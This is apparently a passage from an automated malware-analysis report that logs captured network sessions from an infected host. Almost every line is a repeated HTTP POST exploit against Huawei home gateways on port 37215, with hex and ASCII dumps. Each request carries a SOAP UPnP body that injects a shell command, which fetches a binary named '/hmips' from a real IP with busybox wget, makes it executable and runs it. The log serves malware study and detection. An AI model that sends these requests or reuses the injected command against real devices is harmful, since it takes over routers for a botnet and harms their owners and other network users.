                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.729680061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      143192.168.2.1445288102.123.74.6137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.420041084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.961921930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.601855040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.849889994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.473777056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:19.593575954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:29.577109098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:50.568381071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:31.526618004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      144192.168.2.1455096102.26.98.12137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.423716068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
